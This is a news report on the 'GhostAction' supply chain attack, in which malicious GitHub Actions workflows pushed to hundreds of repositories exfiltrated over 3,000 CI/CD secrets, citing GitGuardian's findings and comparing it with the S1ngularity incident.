A major supply chain attack dubbed ‘GhostAction’ has compromised more than 320 GitHub users and exposed thousands of secrets across the software development ecosystem, according to a report released by GitGuardian.
The attack, which took place earlier this month, saw 327 GitHub accounts compromised, with malicious GitHub Actions workflows injected into 817 repositories. The workflows were designed to exfiltrate secrets from continuous integration and deployment (CI/CD) pipelines, including PyPI, npm, and DockerHub tokens, via HTTP POST requests to a remote server controlled by the attackers.
The breach was traced back to a compromised GitHub maintainer, Grommash9, who on September 2 pushed a commit titled ‘Add Github Actions Security workflow’. This commit introduced a single GitHub Actions workflow file with malicious code designed to harvest and exfiltrate sensitive credentials.
GitGuardian said the attack resulted in the exfiltration of over 3000 secrets, though no malicious releases were detected on PyPI, despite the attackers gaining access to at least one package, FastUUID.
GitHub user Grommash9 reverted the malicious commit after GitGuardian notified PyPI, which promptly moved the affected repository to read-only mode. However, investigators found that similar malicious commits were pushed to at least five other public repositories and an estimated ten private repositories on the same day.
“Using our GitHub commit historical dataset, we identified hundreds of similar malicious commits across multiple repositories. Our analysis revealed that 327 users fell victim to this campaign. From this initial investigation, we found no intersection between those users and the recent S1ngularity attack campaign's victims. Those two incidents are likely unrelated,” the company noted.
Speaking of which, a post-incident evaluation of the August S1ngularity incident, conducted by Wiz researchers, showed that the Nx compromise exposed 2,180 accounts and 7,200 repositories across three distinct phases.
GitGuardian says it identified ”3,325 leaked secrets across the campaign, with DockerHub credentials, GitHub tokens, and NPM tokens representing the most common types.”